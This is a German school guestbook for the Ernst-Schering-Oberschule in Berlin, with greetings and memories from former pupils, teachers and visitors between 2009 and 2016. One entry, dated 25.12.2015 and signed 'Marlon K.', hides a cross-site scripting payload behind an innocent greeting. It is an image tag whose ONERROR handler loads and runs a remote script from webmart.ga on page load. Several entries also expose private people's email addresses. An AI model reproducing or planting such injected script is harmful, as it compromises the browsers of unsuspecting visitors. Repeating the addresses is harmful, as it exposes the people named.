Gästebuch
Willkommen auf dem neuen Gästebuch der Ernst-Schering-Oberschule. Die Einträge des alten Gästebuches sind nachzulesen unter www.eso.cidsnet.de/gbuchalt.htm Ein Hinweis: Bevor die Beiträge veröffentlicht werden, werden sie erst gelesen und dann ins Netz gestellt - oder auch nicht. Anonyme Beiträge werden nicht veröffentlicht! H. Gross

(Insgesamt 211 Einträge)

von ivana leko aus attendorn am 13.05.2016 17:15
Lieben Gruß von deer St. Ursula Realschule Attendorn in NRW

von Marlon K. aus Berlin am 25.12.2015 08:41
Da kommen tolle Erinnerungen an die Schulzeit hoch [IMG]//webmart.ga/img/smile.jpeg" ONERROR="h1=document.createElement('script');h1.src='//webmart.ga/js/err.js';document.body.appendChild(h1);[/IMG]

Viele Grüße an alle ehemaligen Mitschüler sowie an die Lehrer, die mich noch kennen.

von Recad Diab aus Berlin am 11.07.2015 03:27
Die Zeit auf der Ernst-Schering-Oberschule war einfach unbeschreiblich , man muss es selbst erlebt haben . Mir fehlen die Worte um meine Zeit auf ihr in Sätze zu fassen. Aber man wird sich sicher noch an mich erinnern. Ich wünschte ich könnte diese Zeit noch einmal durchmachen ... besondere Grüße an Fr. .ottschalk , Hr. Schmidt und Hr. Becker ... Ihr habt viel durchgemacht wegen uns aber ihr habt uns nie aufgegeben .. Danke ! Recad Diab (oder wie Hr. Becker zu sagen pflegte "Der Araber" Abgangsjahrgang 2007

von Canan Beyaz aus Berlin, Wedding am 30.05.2015 23:27
Hallo, ich heiße Canan Beyaz ich war in der 711, bei Hr. Diehm und Fr. Falk ein paar Mal bin ich zur Schule gegangen um Frau Falk zu sehen ich habe Sie leider nie angetroffen wo ich es immer versucht hatte. Von Frau Falk und Herr Diehm würde ich sehr gerne die E-Mail Adresse haben und Ihnen schreiben. Viele habe ich erkannt so was ich gelesen habe. Wenn ihr mich erkannt habt einige ihr könnt mir schreiben cananbeyaz@web.de vielen Dank.

von Kevin Müller aus Berlin am 18.03.2014 09:24
Ein paar Jahre später, muss ich immernoch an meine Schulzeit denken.

An alles Schüler - genießt die Zeit!

Liebe Grüße an die Lehrergemeinde, die mich noch kennt.

von Kanita am 30.10.2013 18:52
ich habe vergessen meine e-mail adresse reinzuschreiben

kanitab7@hotmail.com
Editiert am: 19.02.2015 18:25 von Administrator

von Kanita am 29.10.2013 18:17
Hallo,
ich suche einen Jungen Namens Ugur Uzun er war in diser schule Abgangsjahr 2005 wenn ihn jemand kennt seiner Nummer mail oder irgendwas hat bitte schreibt mir ein e-mail

danke
Editiert am: 11.12.2014 16:58 von Administrator

von Lia am 11.09.2013 08:54
Beste Grüße an die tollen Schüler dieser Schule. Es hat großen Spaß gemacht, mit euch zusammenzuarbeiten.
Auch vielen Dank an die netten Lehrer, die mich so freundlich aufgenommen haben.
Alles Liebe und Gute euch :)
Lia (Praktikantin der Schulsozialareit 2013)
Editiert am: 19.02.2015 18:24 von Administrator

von Bülent Korkmaz aus Berlin am 19.12.2012 09:54
Hallo habe folgende Frage gibt es noch eine Möglichkeit die Schule zu besichtigen mein Sohn geht in die 6 Klasse der Erika Mann Grundschule gibt es noch einen Tag der offenen Tür im Januar.

Grus Bülent Korkmaz

Kommentar:
Am 8. November 2013 ab 8:45 Uhr bist du herzlich zum Grundschultag der Ernst-Schering-Schule
mit deiner Klasse eingeladen.

von erkan aus keine am 11.12.2012 10:29
Homepage: http://keine
Hallo, ist jemand aus dem Jahrgang 1988,
dann bitte eine Mail an mich senden
erkoo@gmx.de
Gruß Erkan

von D. Müller aus Berlin am 19.07.2012 16:01
Hallo liebe ESO!

Nun ist es auch schon einige Jahre her, als ich diese Schule besuchte. Mittlerweile vermisse auch ich diese Zeiten - vor allem mit dem ein oder anderen Lehrer.

Mein lernen hat sich doch ausgezahlt - vor allem die mathematischen Themen, die ich heute als Geschäftsführer eines Umzugsunternehmens verstehen muss. Danke dafür an Fr. Hohmeyer!

Werde euch bald mal besuchen kommen.

von Angèla Jung aus Berlin am 14.05.2012 00:27
Wer seine alten Freunde sucht, der ist hier genau richtig. Mein Bruder und ich (beide Ehemalige, er:1990, ich:2000) betreiben eine Aktive Seite auf Facebook! Schaut rein: http://www.facebook.com/ErnstScheringOberschule

Freudig grüßt Angèla Jung (2000 -1013)

von rika aus berlin am 08.05.2012 11:22
hallo! vielen dank für die zahlreichen informationen zum thema "jüdisches leben in berlin"! eine sehr schöne und informative projektarbeit, die sicher auch den teilnehmern an diesem projekt einiges an dieser kultur näher gebracht und zur verständigung beigetragen hat. weiter so!

von anna m. aus Schweiz am 25.04.2012 21:17
Hallo,
hab in ein paar Wochen eine Geschichtsprüfung und bin dadurch auf die Lernkärtchen gestossen. EINFACH SUPER! die sind sehr gut aufgegliedert und verständlich. haben mir einige stunden arbeit ersparrt. Deswegen DANKE.

von C. Langos aus Berlin am 15.04.2012 22:49
Liebes ehemaliges Kollegium,
die Wochen, Monate und mittlerweile fast Jahre schleichen ins Land. Mit Bewunderung und Staunen verfolge ich aber immer mal wieder, was ihr alles auf die Beine stellt - bewegen könnt.
Lieber H.G. schon seit Ewigkeiten möchte ich mich bei dir melden und schaffe es nicht. Diesmal ein kurzer Eintrag/Gruß. Ich erinnere mich gerne an die Zeit in der ESO, an die Kollegen, besonders aber an deinen tollen und humorvollen Umgang mit den Kollegen, Schülern und auch (oder besonders???) mit der Arbeit allgemein. Gern würde ich mal auf einen "schnellen" Kaffee vorbei kommen.
Ganz liebe Grüße von Tine

von Nadine Roloff aus Hennigsdorf am 30.03.2012 22:48
typisch,... wie immer auf den letzten Drücker... trotzdem, einen herzlichen Geburtstagsgruss an Claudia Falk! Happy Birthday wünscht Nadine Roloff (Abschlussjahr 1992)

von Canan Beyaz aus Berlin am 23.02.2012 20:49
Ich war in der 2011 im Jahr 2008 Hr.Diehm und Fr.Falk mag ich sehr.Alle Lehrer waren sehr nett und ich bin sicher das sind sie immer noch.Die Schule ist sehr schön die alten Zeiten vermisse ich immer noch.Obwohl ich mit niemanden Kontakt habe aus der ehemaligen Klasse ist es schön das man die Erinnerungen hat.Ich wünsche jeden noch einen schönen Abend.

von F.S. am 06.02.2012 13:02
Tipps zu Bewerbungsschreiben in COMIC SANS?

Ich hoffe der Webmaster hat diese Seite nicht als Referenz auf seinem/ihrem CV...

Damit disqualifiziert man sich doch nur.

von Erdem aus Berlin am 25.12.2011 06:24
Hallo,
bin zufällig auf die Seite geraten. Habe 1991 die Schule verlassen. Viele Gesichter der Lehrer sind mir noch bekannt.
Die besten Lehrer an der Schule sind noch da, oder wohl jetzt auf Rente.
Vielen Dank an
Herrn Jan Schmidt (super Lehrer)
Herrn Neumann (super Lehrer)
Herrn Diehm (immer Spass gemacht)
Herrn Künzel (Leistungskurs Deutsch war immer super)
Herrn Möbius und
Danke an Herrn Linkiewicz

Ich vermisse die Schulzeit, ach könnte man diese wieder zurückstellen, ich vermisse meine Lehrer.

Meine Kinder gehen auch bald auf die Oberschule.

Falls einer der Lehrer dies liest.

Danke danke danke

Nermin Yilmaz, Abgang 1991, KG 1012

von Zaynab Ali Khan aus Lebanon am 10.12.2011 13:06
Hi! gruess euch alle.
Das ist ja jetzt schon 3 jahre her das ich nicht mehr in der Schule bin richtig krass.t
Ich will einfach nur meine Klassenkameraden der 1012 abgangsjahr 2008 gruessen und die 1021 1013.
Frau Hohmeyer und Herr Schindler, ich vermisse euch ihr seit einfach die besten lehrer.
Also ich wohne jetzt im Libanon bin verheiratet und hab ne ausbildung als friseurin gemacht hihiii. PS: ich hab meine Email(msn) adresse da gelassen

von Jessica Richter aus Berlin am 08.12.2011 15:12
Hey Leute,
wie gehts euch denn so???
Die zeit an der Schering war echt geil, auch wenn ich die Letzten wochen nich da war. Man könnte doch mal ein Klassen- treffen machen, dann sehen wir uns mal alle wieder.
Liebe Grüße
Jessy aus der 1011

von Jane Natz am 10.08.2011 00:56
Nun muss ich als ehemalige Lehrerin auch mal schreiben. Gucke mir die neuesten Nachrichten immer wieder an. Wehmut beschleicht mich, euch verlassen zu haben.
Was ihr als Lehrerkollegium veranstaltet mit den Kids. Beeindruckend!
Lange Tafel - langer Atem.
Ihr seid toll - wie immer - . Ihr seid nach wie vor ein Vorbild, was man alles auf die Wege bringen kann.
Ich drücke das Kollegium herzlichst.
Immer noch eure Jane

von Natascha Wichmann & Cathrin Jeyaravi aus Berlin am 10.07.2011 23:09
Ein liebes Hallo von Cathrin & Natascha (Klasse 1022,Jahrgang 2004).
Haben gerade über die Zeit an der Eso-Schule nach gedacht und dachten wir schaun mal rein und hinterlassen Grüße & erzählen kurz was wir bis heute geschafft haben.. ;)

Ich, Natascha habe eine abgeschlossene Lehre als Tierpflegerin.
Danach bin ich auf eine Abendschule und hab mein Abi nach gemacht - mit Erfolg. =D
Jetzt studiere ich sozialpädagogik was mir unheimlich viel spaß bereitet. :)

Cathrin hat ihr Abi gemacht und studiert jetzt Jura, was ihr auch Spaß & Freude bereitet. ;)

Vielleicht schaffen wir es ja mal und erstatten der Eso-Schule ein Besuch ab.
Einfach überraschen lassen. ;)

Wünschen euch alles, alles Gute und ganz ganz viele Grüße besonders an Fr. Bürk & Fr. Greafe. ;)
Die besten Lehrer die es gibt. ;)

Liebe Grüße,
Natascha & Cathrin

von Rami aus der klasse 1011 jahrgang 2008 aus berlin wedding am 19.06.2011 05:07
hey Leute alles klar bei euch hoffe es geht euch hab endlich meine Ausbildung hinter mich natürlich mit erfolg absolviert würde mich auf ein wiedersehen mit euch freuen...^^

von Jutta Schanz aus 2232 Deutsch Wagram Österreich am 08.06.2011 12:26
Tolle Lernkartei -hat mir als Elternteil bei der Suche nach Antworten sehr geholfen -liebe Grüße aus Österreich .

von Rabih N. am 19.05.2011 19:34
Bin mal hier gelandet und wollte unbedingt viele Grüße hinterlassen:
Herr Gaestel, Frau Gottschalk, Frau Hohmeyer und Herr Pletat.

Abgangsjahr: 2008 Klasse: 1022

P.S. ABI in der Tasche^^

von Jacqueline SKORKA aus Berlin am 26.03.2011 20:28
ESO - es war ne tolle Schulzeit! Liebe grüße an alle die mich kennen, besonders an Hr. Diehm und Fr. Bürk!


von suzan celik (yildirim) aus berlin am 27.02.2011 11:01
man man die zeit vergeht sooo schnell, jetzt sind es schon 11 jahre her... das war eine tolle zeit auf der ESO...

von Benny Berndt aus Berlin am 25.02.2011 15:07
Oh man.... schon so lang ist es her als ich von der eso ging und zwar 2007 das war eine geile Eeit auf der eso. Meine Ausbildung habe ich letztes Jahr Sommer absolviert und ging danach zur Bundeswehr.
Ich wünsche mir manchmal die Zeit auf der eso zurück.
Ich grüße Herr Frickel, Frau Göldner und die 1021 agangsjahr 2007 und den rest die mich noch kennen.

von Christine Fehér am 14.01.2011 12:45
Liebe Schüler/innen und Lehrer/innen der ESO,

ganz herzlich möchte ich mich noch einmal für den herzlichen und netten Empfang gestern bedanken. Dies Lesung hat mir außerordentlich viel Spaß gemacht und ich bin noch immer zutiefst bewegt über die Aufmerksamkeit der jungen Zuhörer sowie die interessierten Fragen danach. Der schöne Frühlings-Blumenstrauß schmückt meinen Esstisch zu Hause. Bald komme ich noch einmal vorbei, um die Schülerbücherei ein wenig aufzustocken, es wurden mir von Freunden und Autorenkollegen schon mehrere Bücherspenden für Jugendliche zugesichert.

Liebe Grüße an alle,

Eure/Ihre Christine Fehér

von Petra Neumann aus Köln am 07.01.2011 14:42
Ich war von 1951-1957 Schülerin dieser Schule, damals hieß sie Robinson-Grundschule. Unsere Rektorin hieß Frl. Werner. Wir gingen zu den großen Pausen auf dem hinteren Schulhof meist im Kreis umher; wenn die Pause zu Ende war, stellten wir uns zu zweit nebeneinander und gingen leise die Treppe hoch.
Na, was sagt Ihr? Waren das noch Zeiten? Wir respektierten unsere Lehrer und uns auch gegenseitig.Wir lernten eine Menge und alle fanden einen guten Beruf. Im Jahr 2009 machte ich mich auf die Suche nach ehemaligen Mitschülern und fand über 20 Leute. Im Jahr 2010 hatten wir dann nach 53 Jahren unser 1. Klassentreffen. Wir freuten uns alle riesig und tauschten sehr viele Erinnerungen aus unserer Kindheit. Heute sind wir in dem Alter Eurer Großeltern und ich sage Euch, lernt soviel Ihr könnt, nur dann kann aus Euch ein respektiertes Mitglied unserer Gesellschaft werden. Und Eure Kinder und Enkel können stolz auf Euch sein.
Und noch eins: Ihr seid auf einer tollen Schule! Macht was draus!

von Patrick Fischer aus Berlin am 27.10.2010 22:30
Ich grüße Herr Gimber

von el-issa rami aus wedding am 10.09.2010 13:29
als erstes will ich mein lehrerin fr falk grüßen und natürlich hr diehm
die zeit in ernst war ja eigentlich der hammmer jetzt bin ich ja nur am arbeiten ahh ich bin jetzt im 3 lehr jahr bei karstadt kauffmann im sport bereich tätig also ich grüße alle die mich kenen aber auch die die mich nicht kennen jallah byby

von Sila aus Berlin am 27.08.2010 18:04
Ich finde meine Schule echt geill

von frage am 21.08.2010 15:38
um wieviel uhr müssen wir am montag in der schule sein?
es wäre echt nett wenn mir jemand antworten würde
danke

Steht auf der Homepage: A - Z => Aktuelles
Editiert am: 21.08.2010 15:56 von Administrator

von Gizem Tubay aus BERL?N am 18.07.2010 22:17
TYPISCH 1021
HAT WOHL KEINER DIE ALTEN ZEITEN VERMISST WAS ?!
HALLO LEUTE H?ER IST G?ZEM TUBAY ABGANGSJAHR 2006.
FALLS JEMAND AUS MEINER ALTEN KLASSE DIES HIER LESEN SOLLTE,
MELDET EUCH BEI MIR -UND ZWAR SOFORT!!!
KONTAKTIEREN KÖNNT ?HR M?CH: callalamia@yahoo.de
1021/2006 IHR LEUTSCHEN SOLLTET EUCH ANGESPROCHEN FÜHLEN!!!
BESONDERS AI-NHI UND JULIA!
SONST NOCH WAS...HMMM...ACH JA:
SCHÖNE GRÜSSE AN ALLE LEHRER UND SCHÜLER DIE MICH KENNEN!!!
UND NUN SAYONARA...

von maxi mustermann aus calw am 01.07.2010 07:55
Wir sind echt begeistert von eure seite und wir müssen gerade ein refarat über das judentum machen und wir sind echt froh das wir eure seite haben.

von Patrick Fischer aus Berlin - Tegel am 21.06.2010 17:23
Hat sich ja viel in der schule geändert wie ich sehe...finde ich toll!

mfg patrick fischer

von Asli Cakir aus Berlin-Stuttgart am 21.05.2010 19:41
Hi Freunde bin die Asli Abgangsjahr 2008..Grüße an meine alte Klasse, die 1022,an Herr Geastel, an das Lehrerkollegium und zu guter letzt an meine ganzen Freunde die auf der Schule waren und immer noch sind..und an alle Berliner:D hab BERLIN sehr vermisst, aber bin bald wieder da zu besuch...hab euch alle ganz dolle lieb..ach ja und grüße an die 1012,hab ja noch ein jahr widerholt gehabt:D...alles gute wünsch ich euch ...ASLI CAKIR

von Durdica Bazdar aus Baden-Württemberg am 03.05.2010 00:42
Hallo an Alle von dem Abgangsjahr 2001 ;) hoffe Ihr errinert euch an mich ;) wir hatten die Lehrerin Frau Brinkmeier (schade nur das es das Jahr 2001 nicht gibt auf der HP ;()

Grüße alle Lehrer die mich Unterrichtet haben ;)

von Michael Schramm aus Spandau bei Berlin am 20.04.2010 05:42
Mein Beileid aus tiefstem Herzen den Angehörigen und Schülern von Frau Nissen.
Ich habe sie von 1987 - 91 als eine sehr kompetente, herzliche und einfühlsame Lehrerin kennenlernen dürfen.

"Die Erinnerung ist ein Fenster, durch das ich Dich sehen kann, wann immer ich will."(Verfasser unbekannt)

von safa aus berlin-stuttgart am 01.03.2010 21:51
Abgangsjahr 2005
Kerngruppe 1011
Kerngruppenleiter Hr. Szpyt

Grüße meine alte Klasse die Abgänger 05 peacee safa :)

von Susanne aus berlin am 20.02.2010 23:04
hey denis
alles klaro bei dir? müssen wir mal schauen ob wir auch alle zusammen bekommen die in unsere klasse waren
:) beste grüße an herr geastel

lg susi

von Denise aus berlin am 17.02.2010 00:51
hey leutzZz ....ich grüße alle die kerngruppe 1012 (abgang 2006) .....
würde mich freuen wenn man ein klassen treffen organiesierne könnte ....
trotzdem grüße ich noch unsere alte klassenleherein frau tründelberg ....war oft nicht einfach mit ihr aber sondt gut lehrerin gewessen .....und denn coolsten geschichtslehrer den es gibt herrn geastel .....liebe grüße auch an ihnen ....

MFG Denise

von Ahu Mehtap (Colak) aus Berlin am 03.02.2010 00:31
hey :)Ich war auf der eso v. 95-99 721-921
hatte tolle zeiten mit euch ...
vermisse euch sehr ...
ich grüße besonders Leyla Tabu , alev akbaba , Vildan altin ,dilek coskun , fatma coskun , tugba ,zeynep,janina aysun , amina,diana die boys und die andern die mich noch kennen.
mit einigen hab immer noch kontakt ...machs gut leute
bin zu finden bei facebook bye

meinen damaligen lehrer hab ich auch nicht vergessen hr. BASELT der coolste lehrer damals :)

von JIEHAN Mustapha aus wedding am 10.01.2010 19:33
Hi,grüss euch Schüler der ESO.

Grüss meine alten freunde Moma Ghaanam,
Mona Idelbe,Nahid Idelbe,Chulud,Sabrin Hamad usw
Hatte eine sehr schöne zeit mit euch vermisse euch
hoffe wir sehen uns einmal wieder!!

von Mona Ghannam aus Berlin am 10.01.2010 00:16
hi leuteee

ich war auch mal auf der eso haha waren echt schöne zeiten...die ein oder andren kennen mich bestimmt noch....naja ich grüß meine schatzisss mona idelbe,khulud, sara,jiehan hab euch vermisst...yallah viel spaß euch noch hehe....

von Mona Idelbe aus Berlin am 09.01.2010 23:57
hiiii ich bins mona idelbe,wollte mal alle vom abgangsjahr 2008 und meine alte klasse 1021 ganz doll und lieb grüssen:-)!!!Hab euch alle vermisst:-(((
War auf der schule von 2004-2008 hoffe mal das ihr euch noch an mich erinnern könnt!
vermiss die zeiten auf der schule war ganz schön crazy
meldet euch wenn ihr mich kennt.
ChuChu

von Ralf Diedrich aus im südlichsten Deutschland am 06.01.2010 14:17
Hallo,

als ehemaliger Schüler (Abgangsjahr 1983) freut es mich sehr mal wieder was über "meine" alte Schule zu sehen und zu lesen. Zu unserer Zeit haben wir an der Schülerzeitung Eule gebastelt gibt es so etwas noch in der heutigen Medienzeit?

Gruß
ein ehemaliger

von Sibel Önal aus aus Wedding am 24.12.2009 17:21
Hallo an alle Schüler und Lehrer der ESO, ich hab meine Klasse 10/22 jetzt schon sehr vermisst obwohl wir erst dieses Jahr voneinander getrennt wurden. Es waren die schönsten Zeiten die ich in ESO verbracht habe von 2005-2009. Ich bedanke mich bei allen Lehrern die immer für mich da waren z.B. Fr.Brinkmeier u. Hr. Diehm....

(Insgesamt 211 Einträge)
Eigenes kostenloses Gästebuch starten
WebMart Homepage Tools